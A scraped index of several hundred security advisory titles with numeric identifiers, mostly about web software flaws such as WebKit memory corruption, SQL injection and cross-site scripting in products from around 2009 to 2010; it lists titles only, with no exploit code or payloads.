Webmail Directory Traversal Vulnerability [43220] IBM Lotus Sametime Connect Web Container Unspecified Vulnerability [43156] YOPS (Your Own Personal [WEB] Server) Remote Buffer Overflow Vulnerability [43149] WebAssist PowerStore 3 'Products_Results.php' Cross Site Scripting Vulnerability [43083] WebKit for Apple iPhone/iPod touch Form Menus Memory Corruption Vulnerability [43081] WebKit for Apple iPhone/iPod touch Prior to iOS 4.1 Remote Code Execution Vulnerability [43079] WebKit for Apple iPhone/iPod touch Prior to iOS 4.1 Remote Code Execution Vulnerability [43078] WebKit (CVE-2010-1813) HTML Objects Memory Corruption Vulnerability [43077] WebKit for Apple iPhone/iPod Touch (CVE-2010-1781) Remote Code Execution Vulnerability [43075] Apple iPhone/iPod touch User Interface Accessibility Security Vulnerability [43049] WebKit Element Run-In Styling Use-After-Free Remote Code Execution Vulnerability [43047] Webkit Floating Point Datatype Remote Code Execution Vulnerability [43016] Weborf HTTP 'modURL()' Function Directory Traversal Vulnerability [43003] Webformatique Reservation Manager `index.php' Cross Site Scripting Vulnerability [42951] CMS WebManager-Pro 'c.php' SQL Injection Vulnerability [42844] Apple Safari 'webkit.dll' Invalid SGV Text Style Denial of Service Vulnerability [42842] WebsiteKit Gbplus Name and Body Fields HTML Injection Vulnerabilities [42840] Wiccle Web Builder 'ajax.php' Cross Site Scripting Vulnerability [42828] QtWeb Browser 'wintab32.dll' DLL Loading Arbitrary Code Execution Vulnerability [42801] IBM WebSphere Application Server Web Services Time Stamp Unspecified Security Vulnerability [42781] HotWeb Rentals 'details.asp' SQL Injection Vulnerability [42767] Valarsoft WebMatic Multiple HTML Injection Vulnerabilities [42700] GFI WebMonitor Configuration UI Arbitrary Script Injection Vulnerability [42697] Acunetix Web Vulnerability Scanner DLL Loading Arbitrary Code Execution Vulnerability [42656] OXID eShop Administration Interface Security Bypass Vulnerability [42633] Oracle MySQL 'HANDLER' interface Denial Of Service Vulnerability [42620] Cisco WebEx ARF String Parsing Remote Code Execution Vulnerability [42601] Opera Web Browser 10.61 Denial of Service Vulnerability [42557] simplePHPWeb 'file.php' Authentication Bypass Vulnerability [42500] WebKit CVE-2010-1386 Information Disclosure Vulnerability [42494] WebKit (CVE-2010-1760) Unspecified Security Vulnerability [42483] TT Web Site Manager 'index.php' SQL Injection Vulnerability [42455] Joomla! 'com_weblinks' Component 'Itemid' Parameter SQL Injection Vulnerability [42450] Open Handset Alliance Android Web Browser Remote Information Disclosure Vulnerability [42447] Palm Pre webOS Remote Code Execution Vulnerability and Unspecified Vulnerabilities [42407] Opera Web Browser prior to 10.61 Multiple Security Vulnerabilities [42381] Webkit PDFs For TYPO3 SQL Injection Vulnerability and Remote Command Execution Vulnerability [42293] RETIRED: Amlib NetOPAC 'webquery.dll' Stack Remote Buffer Overflow Vulnerability [42281] IBM WebSphere Service Registry and Repository Multiple Cross Site Scripting Vulnerabilities [42197] KWebKitPart 'webkitpart.cpp' Cross Site Scripting Vulnerability [42193] Nokia QtDemoBrowser 'webview.cpp' Cross Site Scripting Vulnerability [42155] PMSoftware Simple Web Server 'From:' Header Processing Remote Denial Of Service Vulnerability [42153] D-Link WBR-2310 Web Server HTTP GET Request Remote Buffer Overflow Vulnerability [42128] SUSE YaST WebYaST Appliance Pre-Installed Image Default Secret Key Security Bypass Vulnerability [42087] KR - PHP Web Content Server 'krgourl.php' Remote File Include Vulnerability [42049] WebKit 'font-face' and 'use' Elements Use-After-Free Remote Code Execution Vulnerability [42048] WebKit JavaScript String Object Remote Heap Based Buffer Overflow Vulnerability [42046] WebKit 'foreignObject' Elements Use-After-Free Remote Code Execution Vulnerability [42045] WebKit JavaScript Array Signedness Error Remote Code Execution Vulnerability [42044] WebKit Element Focus Use-After-Free Remote Code Execution Vulnerability [42043] WebKit Just-In-Time Compiled JavaScript Stubs Remote Code Execution Vulnerability [42042] WebKit Regular Expression Handling Remote Memory Corruption Vulnerability [42041] WebKit 'use' Element Handling Remote Memory Corruption Vulnerability [42038] WebKit CVE-2010-1787 Floating Elements Remote Memory Corruption Vulnerability [42037] WebKit ':first-letter' and ':first-line' Pseudo-Elements Remote Memory Corruption Vulnerability [42036] WebKit CSS Counters Remote Memory Corruption Vulnerability [42035] WebKit CVE-2010-1783 Remote Memory Corruption Vulnerability [42034] WebKit Inline Elements Remote Memory Corruption Vulnerability [41966] Nessus Web Server Plugin Unspecified Cross Site Scripting Vulnerability [41958] Apple Mac OS X WebDAV Kernel Extension Local Denial Of Service Vulnerability [41895] Stratek Web Design Twilight CMS 'calendar' Cross Site Scripting Vulnerability [41846] Cisco CDS Internet Streamer Web Server Directory Traversal Vulnerability [41843] Microsoft Outlook Web Access for Exchange Server 2003 Cross Site Request Forgery Vulnerability [41726] Gekko Web Builder 'index.php' Cross Site Scripting Vulnerability [41714] Novell GroupWise WebAccess Cross-Site Scripting Vulnerability [41713] Novell GroupWise WebAccess Authentication Information Disclosure Vulnerability [41712] Novell GroupWise WebAccess HTML Injection Vulnerability [41711] Novell GroupWise WebAccess Cross-Site Scripting Vulnerability [41710] Novell GroupWise WebAccess Cross-Site Scripting Vulnerability [41707] Novell GroupWise WebAccess Proxy Feature Stack Buffer Overflow Vulnerability [41706] Novell GroupWise Agents HTTP Interfaces Multiple Cross Site Scripting Vulnerabilities [41705] Novell GroupWise Agents HTTP Interface HTTP Header Injection Vulnerability [41669] Opera Web Browser CVE-2010-2659, CVE-2010-2662/63/64 Multiple Security Vulnerabilities [41620] Oracle WebLogic Server Encoded URL Remote Vulnerability [41618] Oracle Sun Java System Web Proxy Server CVE-2010-2385 Administration Server Remote Vulnerability [41575] WebKit 'WebCore::toAlphabetic()' Memory Corruption Vulnerability [41573] WebKit Geolocation Events Use After Free Memory Corruption Vulnerability [41572] WebKit 'WebSocketHandshake::readServerHandshake()' Memory Corruption Vulnerability [41571] Asterisk Recording Interface Multiple Vulnerabilities [41559] NuralStorm Webmail Multiple Security Vulnerabilities [41546] PHP-Nuke 'Web_Links' Module SQL Injection Vulnerability [41526] Web Cocoon simpleCMS 'show.php' SQL Injection Vulnerability [41462] Microsoft Exchange Server Outlook Web Access Cross Site Request Forgery Vulnerability [41443] Vsftpd Webmin Module Multiple Unspecified Vulnerabilities [41407] MediaWiki Login Interface Cross Site Request Forgery Vulnerability [41375] BlackBerry 9700 Web Browser Unspecified Remote Denial of Service Vulnerability [41372] WorksForWeb iLister 'action' Parameter Local File Include Vulnerability [41365] BrotherScripts Recipe Website 'recipedetail.php' SQL Injection Vulnerability [41344] Wiki Web Help 'getpage.php' SQL Injection Vulnerability [41343] SaschArt SasCam Webcam Server ActiveX Control 'Head()' Method Buffer Overflow Vulnerability [41312] Bugzilla 'data/webdot/' and '.bzr/' Information Disclosure Vulnerability [41309] Wiki Web Help 'uploadimage.php' Arbitrary File Upload Vulnerability [41306] Wiki Web Help Cross Site Scripting and HTML Injection Vulnerabilities [41296] Trend Micro InterScan Web Security Virtual Appliance Multiple HTML Injection Vulnerabilities [41288] ALPHA Ethernet Adapter II Web-Manager Security Bypass Vulnerability [41284] Opera Web Browser prior to 10.60 Multiple Security Vulnerabilities [41267] Free Web Script\xE2??z Online Games Login Multiple SQL Injection Vulnerabilities [41266] Webgriffe Multimedia photoDiary 'install.php' Local File Include Vulnerability [41263] Website Baker Multiple Security Vulnerabilities [41253] Webmaster-Tips.net Flash Gallery for Joomla 'com_wmtpic' SQL Injection Vulnerability [41246] WebDM CMS 'cont_form.php' SQL Injection Vulnerability [41203] MetInfo enterprise website management system 'search.php' Cross Site Scripting Vulnerability [41149] IBM WebSphere Application Server CVE-2010-0779 Cross Site Scripting Vulnerability [41148] IBM WebSphere Application Server Console Unspecified Cross Site Scripting Vulnerability [41125] WebKit (CVE-2010-1763) Unspecified Security Vulnerability [41124] Lois Software WebDB Script Multiple SQL Injection Vulnerabilities [41118] 2daybiz Web Template Software SQL Injection and Cross Site Scripting Vulnerabilities [41091] IBM WebSphere Application Server for z/OS Administrative Console Cross Site Scripting Vulnerability [41085] IBM WebSphere Application Server 'gzip' Data Null Pointer Exception Vulnerability [41084] IBM WebSphere Application Server Unspecified Link Injection Security Vulnerability [41083] VU Web Visitor Analyst 'redir.asp' Multiple SQL Injection Vulnerabilities [41081] IBM WebSphere Application Server 'mod_ibm_ssl' HTTP Request Remote Denial Of Service Vulnerability [41072] Trend Micro InterScan Web Security Virtual Appliance Multiple Vulnerabilities [41064] Weborf HTTP Header Processing Denial Of Service Vulnerability [41054] WebKit Table Handling Remote Code Execution Vulnerability [41053] WebKit 'JavaScriptCore' Page Transition Remote Code Execution Vulnerability [41051] WebKit 'history.replaceState' Cross-Origin Information Disclosure Vulnerability [41042] webConductor 'default.asp' SQL Injection Vulnerability [41039] Trend Micro InterScan Web Security Virtual Appliance Cross Site Request Forgery Vulnerability [41030] IBM WebSphere ILOG JRules Cross Site Scripting Vulnerability [41028] Hitachi Groupmax World Wide Web Desktop Unspecified Cross Site Scripting Vulnerability [40973] Opera Web Browser prior to 10.54 Multiple Security Vulnerabilities [40965] H264 WebCam HTTP Server Buffer Overflow Vulnerability [40927] Softwebs Nepal Real Estate 'viewphoto.asp' SQL Injection Vulnerability [40895] Ruby WEBrick UTF-7 Encoding Cross Site Scripting Vulnerability [40876] eWebquiz 'QuizType' Parameter SQL Injection Vulnerability [40874] SasCam Webcam Server 'GET' Request Remote Denial Of Service Vulnerability [40855] Joke Website Script 'search.php' Input Validation Vulnerability [40815] LiteSpeed Web Server Source Code Information Disclosure Vulnerability [40772] Miniweb 'module' Parameter Local File Include Vulnerability [40763] Miniweb 'module' Parameter SQL Injection Vulnerability [40756] WebKit ':visited' CSS Pseudo-class Information Disclosure Vulnerability [40754] WebKit 'execCommand()' Function Clipboard Overwrite Security Weakness [40753] WebKit Local Storage and Web SQL Database Directory Traversal Vulnerability [40752] WebKit HTTP URI Clipboard Information Disclosure Vulnerability [40750] WebKit HTTPS Redirect Information Disclosure Vulnerability [40733] WebKit NTLM Credentials Information Disclosure Vulnerability [40732] WebKit HTTP Redirects Information Disclosure Vulnerability [40727] WebKit Cascading Stylesheets 'HREF' Information Disclosure Vulnerability [40726] Webkit 'textarea' Element Cross-Site Scripting Vulnerability [40717] WebKit Empty Hostname URI Handling Cross Site Scripting Vulnerability [40714] WebKit SVG Image Pattern Cross Domain Security Bypass Vulnerability [40710] WebKit 'frame.src' Validation Cross Site Scripting Vulnerability [40707] Webkit DOM Constructor Object Cross Site Scripting Vulnerability [40705] WebKit IRC Port Blacklist Information Disclosure Vulnerability [40703] C3 Corp WebCalenderC3 Unspecified Local File Include Vulnerability [40699] IBM WebSphere Application Server 'addNode.log' Information Disclosure Vulnerability [40698] WebKit Keyboard Focus Cross Domain Information Disclosure Vulnerability [40697] WebKit Integer Truncation TCP Port Information Disclosure Vulnerability [40695] C3 Corp WebCalenderC3 Unspecified Cross Site Scripting Vulnerability [40694] IBM WebSphere Application Server 'default_create.log' Information Disclosure Vulnerability [40689] Computer Associates WebScan ActiveX Control Multiple Remote Code Execution Vulnerabilities [40683] WebWiz Forum 'new_reply_form.asp' SQL Injection Vulnerability [40675] Webkit HTML Document Fragments Cross Site Scripting Vulnerability [40672] WebKit CSS-Styled HTML Handling Remote Code Execution Vulnerability [40671] WebKit HTML Tables Remote Code Execution Vulnerability [40670] WebKit Fonts Handling Remote Code Execution Vulnerability [40669] Webkit UTF-7 Cross-Site Scripting Vulnerability [40668] WebKit 'libxml' Context Handling Remote Code Execution Vulnerability [40667] WebKit HTML Document Subtrees Remote Code Execution Vulnerability [40666] WebKit 'removeChild' DOM Method Remote Code Execution Vulnerability [40665] WebKit 'Node.normalize' Method Remote Code Execution Vulnerability [40663] WebKit DOM Range Objects Remote Code Execution Vulnerability [40662] WebKit Hover Event Handling Remote Code Execution Vulnerability [40661] WebKit Use After Free Remote Code Execution Vulnerability [40660] WebKit Dragging or Pasting Cross Domain Scripting Vulnerability [40659] WebKit Custom Vertical Positioning Remote Code Execution Vulnerability [40658] WebKit Caption Element Handling Remote Code Execution Vulnerability [40657] WebKit SVG Remote Code Execution Vulnerability [40656] WebKit SVG 'use' Element Remote Code Execution Vulnerability [40655] WebKit 'first-letter' CSS Style Remote Code Execution Vulnerability [40654] WebKit Option Recursive Use Element Remote Code Execution Vulnerability [40653] WebKit IBM1147 Character Set Text Transform Remote Code Execution Vulnerability [40652] WebKit SVG 'RadialGradient' Attribute Remote Code Execution Vulnerability [40650] WebKit 'DOCUMENT_POSITION_DISCONNECTED' Attribute Remote Code Execution Vulnerability [40649] WebKit 'ConditionEventListener' Remote Code Execution Vulnerability [40647] WebKit Option Element 'ContentEditable' Attribute Remote Code Execution Vulnerability [40646] WebKit Editable Containers Remote Code Execution Vulnerability [40645] WebKit Marquee Event 'SelectionController' Remote Code Execution Vulnerability [40644] WebKit HTML Button Use After Free Remote Code Execution Vulnerability [40642] WebKit 'removeChild()' Remote Code Execution Vulnerability [40637] HP OpenView Network Node Manager 'ovwebsnmpsrv.exe' Bad Option Stack Buffer Overflow Vulnerability [40594] WebBiblio Subject Gateway System 'page' Parameter Local File Include Vulnerability [40577] L2Web LineWeb Multiple Input Validation Vulnerabilities [40575] Weborf HTTP Ranger Header Denial Of Service Vulnerability [40514] Trend Micro Data Loss Prevention Web Chat Content Filtering Security Bypass Vulnerability [40498] Accoria Rock Web Server Multiple Security Vulnerabilities [40465] Websense 'Via' HTTP Header Web Filtering Security Bypass Vulnerability [40425] osCommerce Visitor Web Stats Add-On 'Accept-Language' Header SQL Injection Vulnerability [40378] 360 Web Manager 'webpages-form-led-edit.php' SQL Injection Vulnerability [40362] RETIRED: WebAsyst 'blog_id' parameter SQL Injection Vulnerability [40353] Webby HTTP GET Request Buffer Overflow Vulnerability [40350] NITRO Web Gallery 'PictureId' Parameter SQL Injection Vulnerability [40349] WebAsyst Shop-Script 'index.php' SQL Injection Vulnerability [40342] Kingsoft Webshield 'KAVSafe.sys' Driver IOCTL Handling Local Privilege Escalation Vulnerability [40325] IBM WebSphere Application Server Nodeagent/Deployment Manager Remote Denial Of Service Vulnerability [40322] IBM WebSphere Application Server JAX-RPC WS-Security/JAX-WS Runtime Security Bypass Vulnerability [40321] IBM WebSphere Application Server 'response.sendRedirect' Remote Denial Of Service Vulnerability [40277] IBM WebSphere Application Server Long Filename Information Disclosure Vulnerability [40264] Web 2.0 Social Network Freunde Community System 'user.php' SQL Injection Vulnerability [40255] McAfee Email Gateway 'systemWebAdminConfig.do' Remote Security Bypass Vulnerability [40226] Hitachi Web Server SSL Certificate Revocation Security Bypass Vulnerability [40225] WebJaxe 'administration.php' SQL Injection Vulnerability [40223] Hitachi Web Server with SSL Enabled Remote Denial of Service Vulnerability [40209] NettApp AS Webace CMS 'NewsId' Parameter SQL Injection Vulnerability [40205] SpringSource tc Server JMX Interface Authentication Security Bypass Vulnerability [40196] WebSAM DeploymentManager Denial of Service Vulnerability [40133] MiniWebsvr URI Directory Traversal Vulnerability [40113] Palo Alto Networks Firewall Interface 'editUser.esp' HTML Injection Vulnerability [40092] Movable Type Administrative User Interface Cross Site Scripting Vulnerability [40042] Hi Web Wiesbaden Shop System 'index.php' SQL Injection Vulnerability [40035] Multiple Hi Web Wiesbaden Rueckwaerts Auktion System Products 'cafe.php' SQL Injection Vulnerability [40021] Redatam+SP WebServer 'BASE' Parameter Cross Site Scripting Vulnerability [39899] Eros Webkatalog 'start.php' SQL Injection Vulnerability [39855] Opera Web Browser Asynchronous Document Modifications Remote Code Execution Vulnerability [39837] IBM WebSphere MQ Unspecified Channel Control Data Remote Denial Of Service Vulnerability [39825] Open Web Analytics Local and Remote File Include Vulnerabilities [39780] Mini Web Server Cross Site Scripting and Directory Traversal Vulnerabilities [39772] Memorial Web Site Script Insecure Cookie Authentication Bypass Vulnerability [39770] WebMoney Advisor 'wmadvisor.dll' ActiveX Control Buffer Overflow Vulnerability [39766] WebAsyst Shop-Script FREE Multiple SQL Injection Vulnerabilities [39726] Webessence CMS SQL Injection and Arbitrary File Upload Vulnerabilities [39716] Webessence CMS 'oembd.php' Cross-Site Scripting Vulnerability [39701] IBM WebSphere Application Server SIP Logging Information Disclosure Vulnerability [39689] NKInFoweb 'id_sp' Parameter SQL Injection Vulnerability [39678] Palm WebOS SMS Script Injection Vulnerability [39666] Tiny Java Web Server Multiple Input Validation Vulnerabilities [39664] Memorial Web Site Script 'id' Parameter SQL Injection Vulnerability [39617] Webessence CMS 'type' Parameter Cross-Site Scripting Vulnerability [39567] IBM WebSphere Application Server 'resources.xml' Information Disclosure Vulnerability [39474] Iomega Home Media Network Hard Drive 'smbwebclient.php' Authentication Bypass Vulnerability [39472] Imperva SecureSphere Web Application Firewall and Database Firewall Security Bypass Vulnerability [39447] Oracle Collaboration Suite CVE-2010-0881 Remote User Interface Components Vulnerability [39342] Joomla! Webee Comments Component 'controller' Parameter Local File Include Vulnerability [39306] IBM WebSphere Portal Login Unspecified Security Vulnerability [39295] IBM WebSphere Application Server for z/OS Admin Console Unspecified Security Vulnerabilities [39291] Apple Mac OS X Wiki Server Weblog SACL Security Bypass Vulnerability [39280] FreePHPWebsiteSoftware 'default_theme.php' Remote File Include Vulnerability [39257] Virata EmWeb URI Remote Denial Of Service Vulnerability [39187] Sun Java System Web Server WebDAV Request Remote File Disclosure Vulnerability [39182] uTorrent WebUI HTTP 'Authorization' Header Remote Denial of Service Vulnerability [39178] webERPcustomer Component for Joomla! Local File Include Vulnerability [39106] VMware WebAccess '/ui/vmDirect.do' Information Disclosure Vulnerability [39105] VMware WebAccess JSON Cross-site Scripting Vulnerabliity [39104] VMware WebAccess Virtual Machine Name Cross-site Scripting Vulnerability [39103] VMware WebAccess URL Forwarding Vulnerability [39095] Oracle Java SE and Java for Business CVE-2010-0089 Remote Java Web Start Vulnerability [39091] Oracle Java SE and Java for Business CVE-2010-0090 Remote Java Web Start Vulnerability [39056] IBM WebSphere Application Server Orb Client Remote Denial Of Service Vulnerability [39051] IBM WebSphere Application Server Administration Console Cross Site Scripting Vulnerability [39042] Linux Kernel USB interface Local Information Disclosure Vulnerability [39038] Fuctweb CapCC Plugin for WordPress 'plugins.php' SQL Injection Vulnerability [39037] RETIRED: VMware WebAccess Multiple Vulnerabilities [39034] Eros Erotik Webkatalog 'start.php' SQL Injection Vulnerability [39032] Joomla! 'com_weblinks' Component 'id' Parameter SQL Injection Vulnerability [39011] IBM WEBi Multiple Unspecified Cross Site Scripting Vulnerabilities [38994] Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution Vulnerability [38993] WebMaid CMS Multiple Remote and Local File Include Vulnerabilities [38967] WeBAM Denial of Service Vulnerability and CAPTCHA Bypass Vulnerability [38934] Cisco IOS H.323 Interface Memory Leak Remote Denial of Service Vulnerability [38931] Cisco IOS H.323 Interface Queue Resource Exhaustion Denial of Service Vulnerability [38892] Opera Web Browser XSLT Cross-Domain Information Disclosure Vulnerability [38874] Webmatic HTML Injection and Cross-Site Scripting Vulnerabilities [38833] IBM DB2 Content Manager Web Services Unspecified Vulnerability [38791] Embedthis Appweb 'waitCallback()' Remote Denial Of Service Vulnerability [38692] WebKit Cross-Origin Stylesheet Request Information Disclosure Vulnerability [38691] WebKit HTML Image Element Handling Memory Corruption Vulnerability [38690] WebKit CSS 'run-in' Display Use-After-Free Error Remote Code Execution Vulnerability [38689] WebKit Right-to-Left Displayed Text Handling Memory Corruption Vulnerability [38688] WebKit XML Document Parsing Memory Corruption Vulnerability [38687] WebKit Object Element Fallback Memory Corruption Vulnerability [38686] WebKit HTML Elements Callback Use-After-Free Error Remote Code Execution Vulnerability [38685] WebKit Nested HTML Tags Use-After-Free Error Remote Code Execution Vulnerability [38684] WebKit CSS 'format()' Arguments Memory Corruption Vulnerability [38670] lukeonweb.net MRW PHP Upload 'upload.html' Remote File Upload Vulnerability [38595] Perforce P4Web Weak Session Cookie Session Hijacking Vulnerability [38589] Perforce P4Web Hidden Control Security Bypass Vulnerability [38573] Spectrum Software WebManager CMS 'pojam' Parameter Cross Site Scripting Vulnerability [38541] Emweb Wt Multiple Cross Site Scripting and Unspecified Security Vulnerabilities [38519] Opera Web Browser 'Content-Length' Header Integer Overflow Vulnerability [38459] IBM Domino Web Access Prior to 229.281 Unspecified Security Vulnerabilities [38457] Domino Web Access ActiveX Control URL Handling Buffer Overflow Vulnerability [38434] Website Baker 'framework/class.wb.php' Security Bypass Vulnerability [38416] JSK Internet WebAdministrator 'download.php' SQL Injection Vulnerability [38398] WebKit Style Tag Remote Denial of Service Vulnerability [38375] WebKit 'window.open()' method Cross Domain Scripting Vulnerability [38374] WebKit Image Decoder Memory Allocation Remote Code Execution Vulnerability [38373] WebKit Popup Blocker Security Bypass Vulnerability [38372] WebKit 'file:///' Directory Listing Page Information Disclosure Vulnerability [38360] IBM WebSphere Portal Portlet Palette Search HTML Injection Vulnerability [38333] Infragistics NetAdvantage for Web Client Directory Traversal Vulnerability [38332] IBM WebSphere Service Registry and Repository Configuration Property Security Bypass [38329] Social Web CMS 'index.php' Cross Site Scripting Vulnerability [38328] IBM WebSphere Commerce Local Information Disclosure Vulnerability [38327] IBM WebSphere Commerce Encryption Key Remote Security Vulnerability [38317] LiteSpeed Web Server Cross Site Scripting and Request Forgery Vulnerabilities [38285] Mozilla Firefox and SeaMonkey Web Workers Array Data Type Remote Memory Corruption Vulnerability [38280] Cisco ASA 5500 WebVPN DTLS Packet Denial of Service Vulnerability [38258] Joomla! Webamoeba Ticket System Component HTML-Injection Vulnerability [38212] Squid Web Proxy Cache HTCP Request Processing Remote Denial of Service Vulnerability [38207] RSA SecurID WebID Cross Site Scripting Vulnerability [38204] Joomla! Webee Component SQL Injection and HTML Injection Vulnerabilities [38181] SAP WebDynpro Runtime Unspecified HTML Injection Vulnerability [38170] Cisco IronPort Encryption Appliance WebSafe Servlet Information Disclosure Vulnerability [38168] Cisco IronPort Encryption Appliance Administration Interface Information Disclosure Vulnerability [38143] JDownloader 'JDExternInterface.java' Remote Code Execution Vulnerability [38141] GeFest Web Home Server Remote Directory Traversal Vulnerability [38122] IBM WebSphere Application Server 'Requires SSL' Option Security Bypass Vulnerability [38070] Zeus Web Server Unspecified Cross Site Scripting Vulnerability [38053] WebCalendar Multiple Cross Site Scripting Vulnerabilities [37955] South River Technologies WebDrive Security Descriptor Local Privilege Escalation Vulnerability [37926] Oracle WebLogic Server Node Manager 'beasvc.exe' Remote Command Execution Vulnerability [37924] IBM Lotus Domino Web Access Prior to 229.131 Unspecified Security Vulnerability [37910] Sun Java System Web Server WebDAV Format String Vulnerability [37909] Sun Java System Web Server 'admin' Server Denial of Service Vulnerability [37896] Sun Java System Web Server Digest Authentication Remote Buffer Overflow Vulnerability [37874] Sun Java System Web Server WebDAV Unspecified Remote Buffer Overflow Vulnerability [37871] SAP Web Application Server Unspecified Remote Buffer Overflow Vulnerability [37852] EasySiteNetwork Jokes Complete Website Multiple Cross Site Scripting Vulnerabilities [37841] Web Server Creator Web Portal Multiple Input Validation Vulnerabilities [37829] Zeus Web Server 'SSL2_CLIENT_HELLO' Remote Buffer Overflow Vulnerability [37825] IBM Lotus Web Content Management Login Page Cross Site Scripting Vulnerability [37787] HP Web Jetadmin Remote Information Disclosure Vulnerability [37751] Oracle WebLogic Server CVE-2010-0074 Remote Vulnerability [37748] Oracle WebLogic Server CVE-2010-0068 Remote WebLogic Server Vulnerability [37741] Oracle WebLogic Server CVE-2010-0078 Remote WebLogic Server Vulnerability [37737] Oracle Weblogic Server CVE-2010-0069 Unspecified Remote Vulnerability [37718] Boa Webserver Terminal Escape Sequence in Logs Command Injection Vulnerability [37710] Ruby WEBrick Terminal Escape Sequence in Logs Command Injection Vulnerability [37675] IBM Lotus Domino Web Access Multiple Unspecified Security Vulnerabilities [37654] RoundCube Webmail Cross Site Scripting Vulnerability [37648] Sun Java System Web Server HTTP 'TRACE' Heap Buffer Overflow Vulnerability [37641] Sun Java System Web Server Unspecified Remote Code Execution Vulnerability [37613] LineWeb 1.0.5 Multiple Remote Vulnerabilities [37581] CARTwebERP Joomla! Component 'controller' Parameter Local File Include Vulnerability [37513] FreeWebshop 2.2.9 R2 Multiple Remote Vulnerabilities [37507] Webring 'index.php' Cross Site Scripting Vulnerability [37484] Proverb Web Calendar Cross Site Scripting and SQL Injection Vulnerabilities [37480] Joomla! 'com_webcamxp' Component 'Itemid' Parameter Cross-Site Scripting Vulnerability [37458] Webformatique Car Manager Joomla! Component 'msg' Parameter Cross Site Scripting Vulnerability [37457] OpenX Administrative Interface Authentication Bypass Vulnerability [37451] webMathematica 'MSP' Script Cross Site Scripting Vulnerability [37432] Barracuda Web Application Firewall 660 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities [37402] eWebquiz 'QuizID' Parameter Multiple SQL Injection Vulnerabilities [37392] IBM WebSphere Application Server Feature Pack for CEA Spoofing Vulnerability [37376] RETIRED: WHMCS 'weblink_cat_list.php' SQL Injection Vulnerability [37355] IBM WebSphere Application Server JNDI Remote Information Disclosure Vulnerability [37352] Cisco WebEx WRF File Handling Multiple Buffer Overflow Vulnerabilities [37351] Horde Application Framework Administration Interface 'PHP_SELF' Cross-Site Scripting Vulnerability [37346] WebWorks Help Multiple Cross Site Scripting Vulnerabilities [37343] HP OpenView Network Node Manager 'ovwebsnmpsrv.exe' Remote Stack Buffer Overflow Vulnerability [37341] HP OpenView Network Node Manager 'webappmon.exe' Remote Buffer Overflow Vulnerability [37340] HP OpenView Network Node Manager 'OvWebHelp.exe' Remote Heap Buffer Overflow Vulnerability [37335] Webmatic Multiple Unspecified SQL Injection and Cross-Site Scripting Vulnerabilities [37328] RETIRED: IntelliCom NetBiter webSCADA Multiple Default Password Security Bypass Vulnerabilities [37259] Webmin and Usermin Unspecified Cross-Site Scripting Vulnerability [37228] iWeb Server URL Directory Traversal Vulnerability [37159] IBM WebSphere Portal Cross Site Scripting and Unspecified Security Vulnerabilities [37103] Fuctweb CapCC Plugin for WordPress CAPTCHA Security Bypass Vulnerability [37089] Opera Web Browser Security Bypass and Unspecified Vulnerabilities [37078] Opera Web Browser 'dtoa()' Remote Code Execution Vulnerability [37047] ActiveWebSoftwares Active Bids 'default.asp' SQL Injection Vulnerability [37015] IBM WebSphere Application Server Administrative Console HTML Injection Vulnerability [37012] Symantec Veritas VRTSweb Incoming Data Remote Code Execution Vulnerability [37001] HP ProCurve Switch Management Interface Multiple HTML Injection Vulnerabilities [37000] Drupal Web Services Module Authentication Bypass Vulnerability [36997] WebKit Preflight Request Same-Origin Policy Bypass Vulnerability [36996] WebKit Resource Load Callback Information Disclosure Weakness [36995] WebKit Multiple Remote Code Execution, Denial of Service, and Information Disclosure Vulnerabilities [36942] Pablo Software Solutions Baby Web Server Multiple Request Remote Denial of Service Vulnerability [36933] HP Power Manager Management Web Server Login Remote Code Execution Vulnerability [36920] Roundcube Webmail Multiple Cross Site Request Forgery Vulnerabilities [36919] Microsoft Windows Web Services on Devices API Remote Code Execution Vulnerability [36906] RETIRED: Xerox Fiery WebTools 'summary.php' SQL Injection Vulnerability [36895] RhinoSoft Serv-U Web Client HTTP Request Remote Buffer Overflow Vulnerability [36854] Mozilla Firefox JavaScript Web-Workers Remote Code Execution Vulnerability [36850] Opera Web Browser prior to 10.01 Multiple Security Vulnerabilities [36814] Retired: Cherokee Web Server Malformed Packet Remote Denial of Service Vulnerability [36813] Sun Java System Web Server Unspecified Remote Buffer Overflow Vulnerability [36774] Oracle WebLogic Portal CVE-2009-2002 Remote Unspecified Vulnerability [36769] Oracle Weblogic Server CVE-2009-3399 Remote WebLogic Server Vulnerability [36766] Oracle WebLogic Server Administration Console HTML Injection Vulnerability [36741] Websense Email Security Cross Site Scripting and HTML Injection Vulnerabilities [36740] Websense Email Security and Email Manager 'STEMWADM.EXE' Remote Denial of Service Vulnerability [36721] IBM Rational RequisitePro ReqWebHelp Multiple Cross Site Scripting Vulnerabilities [36714] DWebPro 'file' Parameter Remote Command Execution Vulnerability [36708] Drupal Webform Module HTML Injection and Information Disclosure Vulnerabilities [36659] Palm WebOS 'LunaSysMgr' Service Denial of Service Vulnerability [36618] Microsoft Silverlight and .NET Framework CLR Interface Handling Remote Code Execution Vulnerability [36607] Palm WebOS Multiple Unspecified Vulnerabilities [36605] AfterLogic WebMail Pro Multiple Cross Site Scripting Vulnerabilities [36592] Palm WebOS Email Arbitrary Script Injection Vulnerability [36551] IBM Tivoli Composite Application Manager for WebSphere Unspecified Cross-Site Scripting [36537] Juniper Networks JUNOS J-Web Multiple Cross Site Scripting And HTML Injection Vulnerabilities [36490] nginx WebDAV Multiple Directory Traversal Vulnerabilities [36480] MaxWebPortal 'forum.asp' SQL Injection Vulnerability [36458] IBM WebSphere Application Server Local Information Disclosure Vulnerability [36457] Xerver Administration Interface 'currentPath' Parameter Cross Site Scripting Vulnerability [36456] IBM WebSphere Application Server Unspecified Remote Denial Of Service Vulnerability [36455] IBM WebSphere Application Server Eclipse Help Cross Site Scripting Vulnerability [36454] Xerver Web Administration Authentication Bypass Vulnerability [36437] Novell GroupWise WebAccess Cross-Site Scripting Vulnerability [36400] 3Com Wireless 8760 Dual-Radio 11a/b/g PoE Web Administration Authentication Bypass Vulnerability [36399] BRS WebWeaver 'Scripts' Security Bypass Vulnerability [36388] HP StorageWorks Products Remote Management Interface Privilege Escalation Vulnerability [36373] Mozilla Bugzilla 'Bug.create()' WebService Function SQL Injection Vulnerability [36371] Mozilla Bugzilla 'Bug.search()' WebService Function SQL Injection Vulnerability [36362] Webservice-DIC yoyaku_41 Remote Arbitrary Command Injection Vulnerability [36310] IBM WebSphere MQ Multiple Vulnerabilities [36292] IBM Lotus Domino Web Access Cross Site Scripting Vulnerability [36272] McAfee Email and Web Security Appliance Unspecified Information Disclosure Vulnerability [36268] 